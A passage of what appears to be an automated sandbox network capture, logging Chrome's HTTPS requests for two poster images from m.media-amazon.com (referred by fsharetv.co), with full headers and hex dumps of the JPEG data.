                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ef b8 27 96 56 cb bf 43 40 4e e4 cc 63 7e c6 05 19 0c 91 94 53 f7 35 73 f0 cd 08 77 55 0a ee f4 28 14 3d d1 05 0d e7 81 6e 7d d5 09 6a ff 00 ae bb d0 99 23 8b 28 6e 8b b7 dc a1 be 7a 32 b7 d4 e9 40 0c b1 3d b3 21 33 86 be a6 e1 c7 62 02 50 e3 b5 b7 a8 40 79 31 fe d0 e8 3b 91 4d e0 9e 78 a8 71 e0 ea 1b fa a8 6e d5 80 ea b1 1f e5 25 08 fa 6f 93 c9 f7 3c 94 20 8c a8 43 be 2d fe 4a 1f 5c 9f d1 25 0d ff 00 75 67 bc 28 45 cc 76 8d d5 50 f6 22 8a 1e 9c 50 a2 ef b6 5d de b1 7e 88 76 10 e2 75 21 dd 73 7c 42 32 7c 58 00 17 17 c9 96 d7 5e 29 8b 2c 17 e1 ca 8a 18 af c6 ea 5d 7e 37 28 23 a0 d1 d2 e4 22 39 2f b6 ba 34 71 50 c7 de c4 48 72 79 3e 03 3a 1b 86 bd 4a 12 a1 21 f1 50 d4 0e 2a 12 13 cd fe 97 1d 14 b2 9f e9 98 ae 9d 0a 3d b9 25 38 78 5f bd 28 f0 3a 7d 95 f9 b9
                                                                                                                                                                                          Data Ascii: 'VC@Nc~S5swU(=n}j#(nz2@=!3bP@y1;Mxqn%o< C-J\%ug(EvP"P]~vu!s|B2|X^),]~7(#"9/4qPHry>:J!P*=%8x_(:}


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          103192.168.2.1649838151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:12 UTC644OUTGET /images/M/MV5BMjA5OTk3OTQzOF5BMl5BanBnXkFtZTcwNDcyODkyMQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:13 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 32436
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 9ae1ada0-87b6-4e31-ab7c-bc1a18aa2fa6
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Sun, 16 Mar 2008 00:09:41 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 03 Nov 2044 22:40:13 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2236489
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:12 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000092-IAD, cache-nyc-kteb1890028-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 01 db 01 07 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 ff c4 00 4b 10 00 01 03 03 02 04 04 04 03 07 01 05 04 08 07 00 01 02 03 11 00 04 21 05 31 06 12 41 51 13 61 71 f0 22 81 91 a1 07 14 b1 15 23 32
                                                                                                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"K!1AQaq"#2
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: d2 95 03 04 28 c1 9e c4 1c 8a 54 01 81 26 ac 4d 3e 98 a9 a0 fc 45 f3 47 32 be bf de 87 8a b0 72 b2 23 70 7a 51 6d 8d ba e3 ef 45 18 18 81 d3 14 c4 28 29 4a dc e6 85 00 09 a1 40 0e c1 11 83 3f 4f 7b 52 4e dd 69 63 78 18 3f cf a5 06 d1 e2 b8 53 cd ca 9d e6 3d e6 a3 29 28 ab 7d 13 84 1c da 8a 1b 48 52 d5 c8 80 49 f2 e9 e7 e9 56 2c 5a 78 4a 92 79 96 36 23 21 3e 5f de 9c b7 61 08 05 28 05 20 80 09 22 49 f9 d4 94 81 00 62 08 eb e9 d6 b8 7a bd 7b 95 c6 1d 1e 97 45 e9 51 c7 53 c9 cb 1b 4b 09 04 a8 80 54 72 49 a5 94 82 0a 54 99 41 dc 19 cf cc 1e 94 e0 c0 c9 38 f7 fa d3 0f ba 1a 6c a8 ec 91 24 fc ab 99 6e 4c ec 38 c6 31 fc 19 8d 41 b4 5b 5c bb 6e e2 89 42 48 2d 2b 12 04 98 98 f2 33 f2 aa b7 50 10 e1 09 3c c8 07 06 22 af f8 a7 4d bb b3 36 ef 5d b9 6e 16 e2 12 52 d2
                                                                                                                                                                                          Data Ascii: (T&M>EG2r#pzQmE()J@?O{RNicx?S=)(}HRIV,ZxJy6#!>_a( "Ibz{EQSKTrITA8l$nL81A[\nBH-+3P<"M6]nR
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: a7 d8 dd 36 a1 73 64 c3 c0 c0 25 6d 0d bd 62 9a 9c d7 4c 7b f0 4f f5 42 8e 60 e7 0f 7e 1a df 95 06 2f 6f 2c 08 41 82 5e 57 28 3d e1 60 89 f2 9f 4a 64 7e 17 68 b7 5c 8b d3 f8 ad b5 73 02 40 79 b4 2a 60 9f f9 54 08 f4 8a e8 6e f0 86 80 f2 82 97 a5 30 92 24 fc 04 89 c7 91 8a c2 71 a6 81 a7 69 9a 9d 95 b5 85 a1 6d cb 90 4a 81 51 20 8e 60 90 00 3b 75 ab 3e a7 2c 57 62 86 9f 06 57 51 b4 cc 67 14 f0 95 c7 0a 5c 5a b2 ed e5 bb ff 00 98 42 9c 6d 6c f3 60 03 19 07 be 68 55 cf e2 bb 80 f1 7b 76 e1 b6 d2 2d 6c 9a 68 01 90 70 55 ff 00 d5 f6 a1 5d 7c 2e 52 82 6c e5 ce 29 4a 8c 59 dc c4 c6 41 8d a9 00 4e 06 09 10 23 a1 a7 14 90 6f bc 10 a1 ca 00 e6 92 32 7d 7e 95 21 f6 03 2d f3 86 81 4a 48 52 a0 e4 a6 64 c7 7c 0a cf 93 5b 8d 3d ad 5a 3a 18 fd 3f 34 96 e4 ea 87 ac 1f f1
                                                                                                                                                                                          Data Ascii: 6sd%mbL{OB`~/o,A^W(=`Jd~h\s@y*`Tn0$qimJQ `;u>,WbWQg\ZBml`hU{v-lhpU]|.Rl)JYAN#o2}~!-JHRd|[=Z:?4
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 00 c8 c9 1f 5f 2a 9f a9 6a 36 da 6e 9c fd f3 ea 25 86 12 0a b9 00 2a 02 62 20 75 9f ad 72 f1 a8 b8 fd e5 f3 b6 8e f8 2f ea d7 bf 96 0b 49 1c c8 68 41 30 77 12 54 9f a6 3b 55 fe 8b 60 d5 ce bf ae 2a d5 80 e6 9b 6c 84 b2 86 96 a2 12 e3 c8 12 09 cc 13 20 cf a8 ef 42 92 f0 47 2e 8d 45 26 fe 3f e7 fc fc 1b 86 5c 4d c3 0c ba 94 a8 25 d4 85 00 52 01 c8 90 08 f9 d3 9c 89 53 63 94 24 02 06 c3 61 e4 6b 09 c3 3a 8d de a3 c4 0d a6 f3 54 bb 62 e5 a0 a5 5c 58 3a 80 10 a4 81 1f 0c 00 40 04 83 07 a7 53 5b e1 3c bf 0c 46 e3 d3 1d aa 77 66 3c d8 bd b9 6d 10 52 00 81 88 00 c5 05 00 04 91 81 8e e6 29 5f 11 c1 20 c6 c4 7d 28 72 9e 50 37 88 06 0c fd fd ef 4e ca 78 f0 34 40 52 49 24 88 31 9e dd 7d 2b 9b 71 0a 05 ff 00 e2 5d 8d b1 59 3c 81 94 28 02 48 06 4a 88 1d ba 57 4a 52 14
                                                                                                                                                                                          Data Ascii: _*j6n%*b ur/IhA0wT;U`*l BG.E&?\M%RSc$ak:Tb\X:@S[<Fwf<mR)_ }(rP7Nx4@RI$1}+q]Y<(HJWJR
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: b8 f5 ac 1b bc 4f a9 5a ea da 95 bb 4e a1 eb 5d 35 a5 72 f8 89 03 98 88 1f 11 03 30 64 01 b9 3e 95 26 c7 8d 6e 9c fd 94 d3 b6 68 5b d7 8b 29 5a 90 a8 02 0c 18 04 4e 06 f4 f7 c7 c9 43 d0 e5 4b 72 e8 d1 3f c3 ba 4b ed 25 85 e9 d6 c9 6c 2f c4 09 4b 7c b0 ae 8a 1c b1 9f 9d 29 ed 0a c9 dd 21 7a 43 68 2c 5a a8 64 30 79 08 33 32 0e e4 f7 26 66 ab af f8 d2 c2 cd 0f 3a 86 6e 2e 58 b7 74 34 eb ed 47 28 51 ff 00 48 93 f1 11 89 8d aa 45 c7 17 68 96 cf 35 6f 75 79 e1 3c ef 28 f0 ca 14 4a 49 c8 04 81 00 e7 6a 7e 4a dc 73 b5 7c 8e 69 bc 38 c6 96 fa 6e 15 77 75 77 70 96 8b 29 b8 b9 50 52 90 82 a0 4a 44 01 bc 75 93 56 ea 00 cc 4e 4e fb 4e ff 00 cb f9 50 04 72 f3 89 20 80 00 f2 f7 de 8e 09 26 0e 41 33 3b f7 a7 e4 a2 52 94 9f dd d8 92 01 d9 31 11 00 7a ed eb 43 94 04 9f 88
                                                                                                                                                                                          Data Ascii: OZN]5r0d>&nh[)ZNCKr?K%l/K|)!zCh,Zd0y32&f:n.Xt4G(QHEh5ouy<(JIj~Js|i8nwuwp)PRJDuVNNNPr &A3;R1zC
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 6e 97 1f 69 0d f3 a9 4a 0a 04 a9 5c a4 e0 83 03 e6 66 9f d3 14 ed d6 be 97 34 d2 e3 ac 5d 3f cf 79 61 79 6f fe ea 64 95 49 11 8c 41 19 e9 5a 1b 3f c4 2d 01 e2 79 d7 76 c4 4f f1 b2 55 39 cc 14 ce d5 69 6f c5 9a 05 c4 25 bd 66 d7 9e 27 f7 aa f0 cc 6e 64 a8 0f d6 a3 b3 9e 19 74 f5 39 54 6a 50 ff 00 8c b7 06 4a 8c 28 98 19 11 1b f4 14 b2 91 be 7c f3 bd 30 cd cb 37 21 0e db dc b4 f3 6a 18 2d b8 95 03 e6 08 39 a7 fa 99 98 8e a7 07 35 63 b3 9a d3 f2 21 45 40 80 00 82 7b 48 02 81 20 a6 48 04 1e 80 66 89 44 40 3c c0 9d 84 1e b4 6a 33 f1 60 11 20 19 cc f6 8a 28 46 7b 8d 6e 0b 5c 1f aa 2d 01 27 9d 90 cc 1e cb 50 49 fb 12 7e 55 80 58 2c 7e 18 3e a0 94 05 5e 6a 41 00 91 04 a5 24 09 8e b1 06 b5 bf 89 0f f8 5c 34 c3 21 24 87 af 10 09 04 40 09 0a 56 7e 60 56 43 5c fd c7
                                                                                                                                                                                          Data Ascii: niJ\f4]?yayodIAZ?-yvOU9io%f'ndt9TjPJ(|07!j-95c!E@{H HfD@<j3` (F{n\-'PI~UX,~>^jA$\4!$@V~`VC\
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: f8 df 8a 6c 52 05 be bf 78 12 09 30 e2 c2 c1 fa 83 55 4b d3 e6 bf 4c 89 7d 6c 5d 39 41 1a de 2b e2 e7 b8 86 cd 86 d7 64 bb 4f cb 97 16 a0 54 4f 32 88 e5 11 80 71 9f ad 44 fc 4b bc 5d 95 fe 85 a7 30 fa c1 b5 d3 11 cc 94 81 00 98 03 71 d9 26 a0 b5 f8 a7 c4 e1 0b 45 ca ac 6e c2 a2 03 d6 c0 c7 d3 d2 a8 f8 9b 88 6e 78 9b 58 56 a5 74 d3 6d b8 5a 4b 5c ad c9 00 26 73 9c c9 24 9a 78 74 52 8c ee 7c a6 4b 36 bb 74 23 1c 6b 6d 10 ce a3 79 3f f1 2b f5 84 ff 00 4a 15 0f 9b a1 22 7e 94 2b 6f d2 e1 ff 00 49 9f eb b5 1f eb 63 89 22 06 37 19 a4 ba 02 c6 d2 0f 4e f4 a4 81 03 00 98 a2 57 7f 7e f7 ab 9c 53 4d 3f 26 44 da 69 ae c6 cb d7 25 a2 c1 5a 5b 64 47 31 49 f8 94 3b 13 d0 7a 45 1d 8d c3 7a 6e a9 6c a2 3c 3b 74 99 75 c0 90 4a 41 91 cc 07 52 26 40 ee 28 e7 15 1a e5 80 e8
                                                                                                                                                                                          Data Ascii: lRx0UKL}l]9A+dOTO2qDK]0q&EnnxXVtmZK\&s$xtR|K6t#kmy?+J"~+oIc"7NW~SM?&Di%Z[dG1I;zEznl<;tuJAR&@(
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 80 7c fc ab 72 69 ab 45 3c a7 4c 30 00 1d 26 85 14 9a 15 2a 15 8e 8f e1 18 34 92 7a 9d e9 58 81 be dd e9 30 3b 52 18 47 13 49 d8 cc fa e3 3d 69 47 6a 4c e3 31 df 1e f3 40 0e 30 56 87 02 9b 49 24 64 81 9c 01 e7 51 ef c2 dd 21 4a 42 12 06 24 a8 08 99 c6 f4 e4 91 b1 23 6d a9 9f d9 aa 73 e2 8f 84 92 63 e7 f6 de b9 ba ec 69 35 36 ce 96 86 72 94 5e 34 ac 79 8b b7 1a 68 27 99 90 22 01 e7 00 8f 2c ed 50 ee 8a dd 70 38 1e 6c 28 19 04 2c 08 23 d2 9f fd 90 a1 bc 63 06 9c 1a 39 20 0e 5c cc 62 b9 db a0 9f 67 49 c3 2c a2 a3 b4 b2 b2 bd 4d d3 49 0e 11 e3 80 01 03 3c c3 a1 9e f0 29 ab e7 39 dd 4a 13 20 24 49 cf 53 51 4d a1 b1 5a 54 15 1c e3 10 76 8c 9f d6 82 dc 52 d4 56 a2 01 39 33 b4 77 fa 4d 6d d2 69 56 f5 95 74 66 d6 eb 67 ed bc 32 55 24 4b d2 90 eb 9a bd 9a 58 69 2e
                                                                                                                                                                                          Data Ascii: |riE<L0&*4zX0;RGI=iGjL1@0VI$dQ!JB$#msci56r^4yh'",Pp8l(,#c9 \bgI,MI<)9J $ISQMZTvRV93wMmiVtfg2U$KXi.
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 51 5e 5e 96 96 83 ac 27 c3 50 12 10 b6 be 20 4c 08 26 4e 77 cd 51 dc ea 6f 8d 44 2d 4c a2 e6 d1 b8 29 6d 4b 28 54 8d c8 20 67 c8 1c 54 e1 9a 2d 72 f9 2b cb a7 6e 4f 64 69 23 56 00 20 15 12 48 19 a2 88 12 3a 9c d3 16 ba a5 8d ea 82 59 ba 4a 5e 54 43 0e 1e 55 03 b4 67 07 7e 86 a5 b8 14 85 14 29 24 14 90 08 22 0e 3b d5 c9 a6 ad 18 e4 9a 74 d5 0c 10 09 93 82 71 8d fa ed 49 11 24 e0 cc ef b1 f7 31 f3 a5 90 41 26 30 73 03 d3 fb 51 28 4e 20 ce 33 d2 3d cd 3e 05 42 08 11 f1 02 7a 03 39 fb fb da 93 00 02 54 20 6e 47 9e 3f af bd e9 c5 08 02 40 1e 43 03 ae 29 30 20 80 7d 3c 8f 7f ed 4c 28 6a 04 e0 49 22 2a df 86 ef 4d bd c3 96 0e 98 fc c1 2e 34 00 c0 58 10 a0 27 b8 13 ea 0f 7a ab 80 08 89 ce e6 7e b4 1d 0b f8 16 d1 29 71 a5 78 8d a8 18 85 01 23 1d ba 52 e0 94 5b 8b
                                                                                                                                                                                          Data Ascii: Q^^'P L&NwQoD-L)mK(T gT-r+nOdi#V H:YJ^TCUg~)$";tqI$1A&0sQ(N 3=>Bz9T nG?@C)0 }<L(jI"*M.4X'z~)qx#R[
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 7a cb 66 e4 00 20 26 e5 ac 2d 23 a7 c4 85 03 de 41 a9 24 4a 66 20 47 a0 3e 9e fb f9 d3 69 78 39 22 37 cc c8 eb d7 df f6 a5 24 36 86 dc 79 e5 a5 96 1a 49 5b ae 2b 64 81 03 e6 4c 88 03 3e 54 82 08 26 44 46 76 83 ef df a1 5f bf 69 6b c3 b7 af ea 28 52 ed 52 a6 c1 40 24 15 28 10 52 93 d8 12 05 55 92 4e 2b 82 50 49 b4 98 db 97 e5 e6 6e 93 a6 31 2a 61 41 2b 79 d7 02 4a 41 4f 34 f2 91 fc 39 39 31 9d e2 b9 fd d7 11 5d d8 6a 33 ff 00 69 ee 6e 1c 42 c2 92 eb 60 94 b5 13 28 e5 9e 45 03 89 dc 62 97 7b 7d ab 71 6b a1 fb bb 95 21 97 55 0d 5a a0 84 a5 52 62 54 44 48 9e 86 9c e2 8e 11 63 43 3e 00 bd b2 7a e1 29 21 c6 59 05 2b 6c 8e a4 19 04 6f 9e b4 61 8b 8b b6 ec b3 2e 68 f5 15 d1 71 a3 71 4d 97 12 ea c2 d6 ee d8 b4 e1 48 36 cc 82 14 ca 96 04 ac a8 44 f3 1d d2 32 07 4c
                                                                                                                                                                                          Data Ascii: zf &-#A$Jf G>ix9"7$6yI[+dL>T&DFv_ik(RR@$(RUN+PIn1*aA+yJAO4991]j3inB`(Eb{}qk!UZRbTDHcC>z)!Y+loa.hqqMH6D2L


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          104192.168.2.1649840151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:12 UTC676OUTGET /images/M/MV5BODA3YWQwODktZDJhOC00YTMwLTgyMzUtYzFhZWI4MGYyYjQ0XkEyXkFqcGdeQXVyNTA4NzExMDg@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:13 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 22247
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 39030e50-24c1-47d4-a07a-c78cefdcd14e
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 21 Apr 2021 18:38:21 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 09 Sep 2044 17:41:42 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 3359356
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:12 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200170-IAD, cache-ewr-kewr1740021-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 b3 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 05 02 03 04 06 00 01 07 08 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 04 00 01 02 03 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e7 49 87 18 cc d3 18 23 49 1f 40 7c 48
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5I#I@|H
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 73 48 e5 6e c9 5b 1a fc 5a d9 a0 95 9f af 9b a2 de 93 76 a3 dc b9 fd 59 a1 2c c3 c5 78 47 80 14 74 56 bb 26 7d 6a b5 39 d6 ad 59 34 51 7e 8f 2d 94 38 b2 ea 88 fb 6e a4 cb 12 db 1e c8 b1 dc 99 cc ea 1a 03 63 19 43 85 c7 1b b9 dd 98 31 eb 6b e6 d5 1b 2d 6f b0 e7 92 85 68 c1 f2 b5 66 ab a9 dd ea b6 ea a8 f6 62 74 a1 4a 5d 86 b7 d1 aa b4 e7 41 ac 12 e7 f5 4a 8f 54 08 c7 7b 87 bb ab 3c e8 e8 cf 73 84 86 cf 83 22 43 3a da c8 8e f2 50 5d 6c 2e 46 99 45 91 b4 0b 76 3d 1e 0e 3e bd a9 a0 91 69 81 21 e8 da 53 4a ae ba 2c f9 c5 78 f5 7f b7 e7 31 38 a3 05 c8 73 14 9c ad 42 e9 50 a2 e8 92 1b 74 53 37 d5 39 6f 5a 6b 3a f2 98 9d cb 97 4e 0c 6c 37 44 75 54 a9 31 41 0b 24 59 79 45 6b 9e 30 9a a9 b8 37 71 b5 8b 95 b9 e3 b1 c4 5f 90 85 e9 a4 9c d6 80 d1 aa 5e 9b 61 15 4e fa
                                                                                                                                                                                          Data Ascii: sHn[ZvY,xGtV&}j9Y4Q~-8ncC1k-ohfbtJ]AJT{<s"C:P]l.FEv=>i!SJ,x18sBPtS79oZk:Nl7DuT1A$YyEk07q_^aN
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: e4 da 53 b0 24 b3 c9 1d 25 16 45 e5 38 22 12 c4 34 e3 24 ae 23 e9 8a 31 99 6c 9d 2f 99 26 03 2f 31 27 e3 e6 32 80 ee 64 22 9d 66 42 51 27 66 5a ed ca cc 4b 70 33 12 db d9 8c cd ab 31 4b 59 99 24 41 8c c6 56 09 99 94 b6 89 66 5b 50 88 b9 95 5c d5 67 31 dd 71 b3 27 1d 66 64 d7 ff c4 00 31 10 00 02 01 02 05 04 01 03 04 01 05 01 01 00 00 00 00 01 02 03 11 04 10 12 21 31 13 20 32 41 22 05 42 51 14 23 30 33 15 40 43 52 61 71 24 53 ff da 00 08 01 01 00 01 08 02 d6 ce a3 3a ac ea b3 aa ce ab 3a ac ea b3 ac ce ab 3a ac eb 33 ac ce b3 3a ac ea b3 ac c5 58 ea b3 aa ce b3 3a cc ea b3 ac ce b3 3a ac 73 1d 59 21 d6 67 5d 9d 76 75 99 d6 67 59 9d 76 75 99 d6 67 59 8f 2b ff 00 a3 bf 72 34 8e 3f c1 7f e4 7f e8 da 1c 3f 1d 88 bf f3 c6 8c a5 c2 c1 55 3f 41 31 60 74 ee d6 8f
                                                                                                                                                                                          Data Ascii: S$%E8"4$#1l/&/1'2d"fBQ'fZKp31KY$AVf[P\g1q'fd1!1 2A"BQ#03@CRaq$S:::3:X::sY!g]vugYvugY+r4??U?A1`t
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 60 a1 52 49 65 5e 36 96 55 38 ed c1 5f a7 0b dc e4 9c ac 57 7a 9a b5 1c 44 e8 f1 86 c5 aa ab 7c ae 8a d0 d3 5e 2c b3 2c c5 02 51 45 a2 74 e2 ca 90 8c 61 36 3f 65 b3 ff 00 60 fa 47 9c c6 70 21 b3 15 24 ea 3b 64 f7 34 44 9f 1d b8 2a ca 51 49 ba 90 47 51 cd a8 c5 d4 50 da 33 7a e3 7c e3 86 93 25 78 36 8e 94 5e ea ee ea 46 b9 9d 49 1d 49 7a eb 4d 8b 14 cf d4 95 6a 6b 83 89 1a 6a 1c 56 c2 aa dc 7e 8c fd 19 d1 bc 34 18 38 f4 1b ba 77 e2 d9 62 aa 74 e9 b7 da d9 2e 3b 68 90 30 ef 4c f7 a9 41 dd b8 da 42 51 f7 0a 91 8f 8f 52 4f 8e 83 12 e9 b1 91 7e 8d 8b 58 86 cc 6b e5 73 62 e8 f5 72 f6 25 b4 87 55 a1 ce 13 f2 e9 af 5d 29 22 35 5c 5f ca a4 e5 13 17 27 29 6f d9 27 b9 2c b6 b6 74 39 20 2d d6 92 2d 51 d9 d4 9d d6 d1 9b 46 ba a7 ea 65 ed 62 63 ee b5 45 2b 59 70 3d ac
                                                                                                                                                                                          Data Ascii: `RIe^6U8_WzD|^,,QEta6?e`Gp!$;d4D*QIGQP3z|%x6^FIIzMjkjV~48wbt.;h0LABQRO~Xksbr%U])"5\_')o',t9 --QFebcE+Yp=
                                                                                                                                                                                          2024-12-15 11:38:13 UTC1378INData Raw: 5a a5 26 40 a8 3c 9a db 7f 8b 36 46 a4 58 7b 22 63 2c 29 0a af e6 15 a2 42 a2 7c 6b 6b 89 4f f2 ab 26 ed 95 5a ff 00 8b ea bb 67 27 4d 8e 0c e9 b1 46 43 8d b9 d2 fd bb 1c 96 45 0f 8c 89 8e ae 9e 7c 85 b0 d9 c8 d9 36 99 64 6e 69 14 47 1b 64 e0 c7 06 84 45 5f 63 a0 88 2b 6c aa d6 f4 b4 dd 96 51 69 a7 5e f1 1a 34 1a 51 ff 00 4e cf d5 8d 37 29 a1 cc ea 0d 8b 71 a2 2f 4d 98 ea b6 3b be 6f a6 c4 2b df 66 cb 5c 7b 8d 23 49 6b 17 62 dc e5 ed 97 a6 69 29 bd 3b 9d 4b 93 a8 f8 cd c4 d0 cb 34 24 da ca f9 49 70 44 8e cc 94 77 3a 7f 9d 8d cd 43 b5 88 c5 3e 1e e4 91 a4 53 d2 46 a8 e4 39 26 58 5b 64 9d b9 24 68 b7 29 6a d9 36 96 ca d7 36 24 90 a1 72 ca 23 34 6d be 86 4a 5b d9 2d c8 fb 34 2e 4b 37 ce 9b 11 43 72 34 7e 5a 45 ef cb 20 43 de 5e 8b db 8d 52 44 77 e5 d3 34 7e
                                                                                                                                                                                          Data Ascii: Z&@<6FX{"c,)B|kkO&Zg'MFCE|6dniGdE_c+lQi^4QN7)q/M;o+f\{#Ikbi);K4$IpDw:C>SF9&X[d$h)j66$r#4mJ[-4.K7Cr4~ZE C^RDw4~
